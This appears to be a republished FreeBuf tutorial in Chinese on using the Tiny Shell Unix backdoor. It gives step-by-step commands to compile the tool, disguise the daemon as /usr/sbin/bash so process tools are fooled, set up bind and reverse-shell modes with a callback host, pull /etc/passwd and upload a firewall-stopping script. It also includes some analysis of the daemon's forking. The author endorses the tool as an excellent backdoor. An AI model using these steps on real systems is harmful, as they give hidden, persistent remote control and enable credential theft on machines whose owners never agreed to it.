学习
实践
活动
工具
TVP
写文章
专栏首页FreeBuf短小精干的Unix类后门Tiny shell的使用与分析

短小精干的Unix类后门Tiny shell的使用与分析

0x00. 简介

Tiny Shell 是一款开源的Unix类后门shell工具,由C语言编写,体积小(在kali系统上编译后只有55K大小)

分为客户端和服务端,支持正向连接模式(即服务端在远程运行,hacker远程直接链接),和反弹连接模式(hacker在自己服务器监听,服务端链接hacker监听端口)

功能:

通信加密 支持上传、下载、直接反弹shell

下载地址:<点击阅读原文查看链接>

https://github.com/orangetw/tsh

具体使用与分析见下文

0x01. 使用与分析

源码很少,非常精简

一、正向连接模式使用与分析

I、编译前,你需要做以下设置

  1. 修改tsh.h中的secret的值

secret 的值用于加密 控制端和被控端之间通信的数据

和后门的所有的通信信息都会被AES加密

编译之后,客户端和服务端都会硬编码这个secret,用于解密数据

  1. 修改tsh.h中的SERVER_PORT值

SERVER_PORT是后门运行后监听的端口

  1. 修改tsh.h中的FAKE_PROC_NAME值

FAKE_PROC_NAME 是用于伪装显示后门运行后的进程名字,比如这里设置为/bin/bash, 那么后门运行后,用ps -ef 或者netstat 查看,则显示的执行程序是/bin/bash ,如下图所示

  1. 注释掉 如下两行代码
//#define CONNECT_BACK_HOST
"10.1.100.3"//#define CONNECT_BACK_DELAY 30

这两行注用于设置反弹链接模式,下面再介绍

修改好后的示例如下:

编译

make linux

make 后面跟的是系统类别,这里以linux为例

编译成功后,tsh为客户端,tshd为服务端

II、运行前的工作

  1. 执行以下命令
umask 077; HOME=/var/tmp

umask设置是为了运行后的后门shell环境而设置,后门shell所有创建的文件只有后门shell进程属主有权限,其他都没权限

  1. 修改tshd 为你要伪装显示的进程名字

这里修改成bash

mv tshd bash

如果不修改的话,直接运行后门进程,则使用lsof -i:8080 查看, COMMAND不会显示为tsh.h设置的伪装的进程名字

所以这里要修改一下可执行文件名字

然后再运行一下,执行lsof -i:8080 发现COMMAND变成了bash,这样迷惑性会更大一些

  1. 将后门文件移动至 /usr/sbin (当然也可移动到其他隐秘的地方,这里以/usr/sbin举例)

如果想要更加具有欺骗性的话,则需要把后门文件移动至/usr/sbin (系统自带的bash位于/bin/bash 和 /usr/bin/bash)

如果不移动的话,使用pwdx 进程ID 可以查看到后门进程所在的执行目录

移动到/usr/sbin之后,再运行,然后用pwdx 查看

显示在/usr/sbin, 欺骗性增加一些

III、运行使用

1. 直接获取被控端shell

服务端运行 (被控端. IP: 10.1.100.3, kali系统)

/usr/sbin/bash

: 服务端运行后,其父进程PID是1,也就是说这个进程是守护进程除非重启系统,或者手动关闭,否则一直存在(当然你也可以加入启动项,或者加入任务计划中)

客户端(控制端 10.1.100.2)

./tsh 10.1.100.3

但是执行之后,没反应,并没有返回远端的shell,奇怪,我未将tshd移动到/usr/sbin下保存为bash 是没事的,一切OK,测试正常,但是将tshd移动到/usr/sbin/bash 之后,客户端就链接不上,我决定查查代码, 查了一会儿,在tsh.c的236行找到了问题的原因

这里直接调用系统命令bash,而被控端的环境变量PATH值为:

/usr/local/jdk1.8/bin:/usr/local/jdk1.8/jre/bin:/usr/local/jdk1.8/bin:/
usr/local/jdk1.8/jre/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/
bin:/sbin:/bin:/usr/local/apache-ant-1.10.1/bin:/usr/local/gradle/bin

/usr/sbin 先于 /usr/bin/bash 和/bin/bash找到bash命令 ,于是我们知道我们执行了假的bash(就是我们自己的后门程序),所以这里解决办法就是修改源码,显示指定要执行命令的路径

重新编译执行,然后客户端再次连接

./tsh 10.1.100.3

成功,OK

2. 下载文件

除了可以直接连接上去外,这个后门还可以下载和上传文件

下载远程的/etc/passwd文件到当前目录

./tsh 10.1.100.3 get /etc/passwd .

3. 上传文件到远程被控端

上传

./tsh 10.1.100.3 put stop_fw.sh /tmp

远程查看上传成功

二、反向连接模式使用与分析

反向链接适用于被控制端位于防火墙后面,不允许外面直接连接,这就需要被控端从里从外主动连接

编译前的准备工作和 编译正向连接模式类似,不过 需要将如下两行去掉注释,即去掉//

#define CONNECT_BACK_HOST  "10.1.100.3"#define CONNECT_BACK_DELAY 30

CONNECT_BACK_HOST 表示反向连接的主机(就是被控端主动要连接的控制端的IP)这里设置反向连接的主机是10.1.100.3 (kali 这里变成了控制端了)

CONNECT_BACK_DELAY 表示隔多久尝试连接控制端一次 (被控端会一直不断循环,尝试连接控制端, 见下图代码,while 死循环)

位于被控端的后门运行之后,会一直尝试连接控制端 (下图为实际抓包)

1、编译

make linux

2、在控制端执行监听

./tsh cb

cb 表示反向监听模式

将tshd 上传到被控端,重命名为bash,移动至/usr/sbin/bash

3、被控端执行后门 (10.1.100.2 )

/usr/sbin/bash

查看后门进程信息

被控端进程也是守护进程,PID为3082

大约30秒后(这个等待时间可在编译时设置,见上文),被控端shell就反弹到了控制端

然后此时查看被控端相关和后门相关进程信息:

其中 -bash 是真实的bash进程

这里的PID为3082、3147都是后门守护进程,伪装成了’/bin/bash’, PID为3148的进程是后门守护进程执行系统命令exec /bin/bash —login 反弹出来的shell进程

解释一下反弹shell之后,这里为什么会又出现一个守护进程(也就是pid为3147的进程)

回到最开始

执行后门 /usr/sbin/bash

执行之后,主进程会fork一个子进程(上面已经提到),父进程退出,这样fork出来的子进程就会成为孤儿进程被init托管(也就是pid为3048的进程)

当PID 为3048的这个进程成功连接上控制端监听的端口之后,则又fork一个进程用(姑且称之为子进程2)于处理建立好的连接(tshd.c代码 211行开始)

子进程2 又会新fork一个子进程(称之为子进程3),然后子进程2退出,子进程3成为孤儿进程,被init托管,成为守护进程,子进程3是真正用户处理连接后的交互

0x02. 总结

总的来说,Tiny shell 是一款非常不错的后门,体积小,功能够用,而且通信加密,源码也不是很复杂,大家有空可自行研究。

文章分享自微信公众号:
FreeBuf

本文参与 腾讯云自媒体分享计划 ,欢迎热爱写作的你一起参与!

作者:dapzxb41693
原始发表时间:2017-06-30
如有侵权,请联系 cloudcommunity@tencent.com 删除。
登录 后参与评论
0 条评论

相关文章

  • 60行C代码实现一个shell

    1969年,Unix初始,没有fork,没有exec,没有pipe,没有 “一切皆文件” ,但是那时它已经是Unix了。它简单,可塑。

    Linux阅码场
  • 权限维持_Linux操作系统后门

    以 ssh 为例,每当有 ssh 的连接请求时,tcpd(Tcp Wrapper的守护进程)即会截获请求, 当请求满足配置文件中的规则,则放行,否则中断连接,配...

    用户2202688
  • Linux后门整理合集

    UnixBash 远控后门 简介 利用 Unix/Linux 自带的 Bash 和 Crond 实现远控功能,保持反弹上线到公网机器。 利用方法 先创建 /et...

    企鹅号小编
  • Linux下常见的权限维持方式

    攻击者在获取系统权限后,通常会留下后门以便再次访问。本文将对Linux下常见的权限维持技术进行解析,知己知彼百战不殆。

    Bypass
  • 渗透基础-SSH后门分析总结

    ? ? 对于UNIX系统来说,ssh服务端作为最广泛应用的远程管理服务并且有一定对外开放的必然性,必然引起黑客关注,所以ssh类的后门也是uni...

    xfkxfk
  • CVE-2018-14847:一个能修复自己的RouterOS漏洞

    2018年10月7日,来自全球知名高科技网络安全公司Tenable的安全研究人员Jacob Baines针对CVE-2018-14847[2]发布了一段新的概念...

    绿盟科技研究通讯
  • 你的Linux服务器是怎么成为肉鸡的?

    简单实施,服务器是怎么成为肉鸡?受到dos攻击后是什么状况?成为肉鸡之后如何简单的溯源?查找攻击ip?查杀进程

    我爱吃瓜瓜
  • 使用Jenkins一键打包部署SpringBoot应用,就是这么6!

    Jenkins是开源CI&CD软件领导者,提供超过1000个插件来支持构建、部署、自动化,满足任何项目的需要。我们可以用Jenkins来构建和部署我们的项目,比...

    macrozheng
  • Msfvenom参考总结

    metasploit-framework旗下的msfpayload(荷载生成器),msfencoder(编码器)

    C4rpeDime
  • msfconsole笔记

    载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,...

    逍遥子大表哥
  • 针对WordPress的攻击调查

    WordPress是一个著名的开源内容管理系统(CMS),用于创建网站和个人博客,据估计,目前35%的网站都在使用CMS。

    FB客服
  • APT15组织研究白皮书

    Ke3chang组织也被称为APT15,该组织的攻击行为于2012年第一次被曝光,该组织当时利用远程后门攻击全世界的高价值目标。该组织活动最早可以追溯到2010...

    FB客服
  • 32764端口后门重出江湖,影响多款路由器

    在年初的时候已经发布关于秘密后门——“TCP 32764”的报道,利用该后门漏洞,未授权的攻击者可以通过该端口访问设备,以管理员权限在受影响设备上执行设置内置操...

    FB客服
  • 政企机构用户注意!蠕虫病毒Prometei正在针对局域网横向渗透传播

    近日,火绒安全实验室监测到蠕虫病毒“Prometei”正在全网传播。该病毒通过横向渗透攻击方式对局域网中的终端进行大面积入侵,并且可以跨平台(Windows、L...

    用户6477171
  • KITT-Lite:基于Python实现的轻量级命令行渗透测试工具集

    KITT渗透测试框架是一种基于Python实现的轻量级命令行渗透测试工具集,本质上上来说,它就是一个针对渗透测试人员设计的开源解决方案。在KITT的帮助下,广大...

    FB客服
  • 【技术分享】红队权限维持方法杂谈

    本次分享分两部分,分别介绍Linux和Windows的权限维持,今天主要介绍Linux的,为了节省时间,这里就选择我平时用的比较多的较为好用的方法来介绍

    物联网安全小编
  • 渗透痕迹分析随笔

    网上,关于入侵痕迹分析的文章很多,在此将个人工作中常用的一些方法技巧(班门弄斧了),以及爬过的坑总结如下(当然,其中有些方法也是从各位前辈的经验中学习的)。入侵...

    FB客服
  • Metasploitable 2系列教程:漏洞利用之Unreal IRCd 3.2.8.1

    这篇文章中,将会介绍如何利用 Metasploitable 2 上 Unreal IRCd service 存在的漏洞;学习如何对网络服务进行枚举,及如何定义和...

    FB客服
  • 黑客术语基础知识快速了解

    1.肉鸡:所谓“肉鸡”是一种很形象的比方,比方那些能够随意被我们操控的电脑,对方可所以Windows体系,也可所以UNIX/Linux体系,可所以一般的个人电脑...

    企鹅号小编

扫码关注腾讯云开发者

领取腾讯云代金券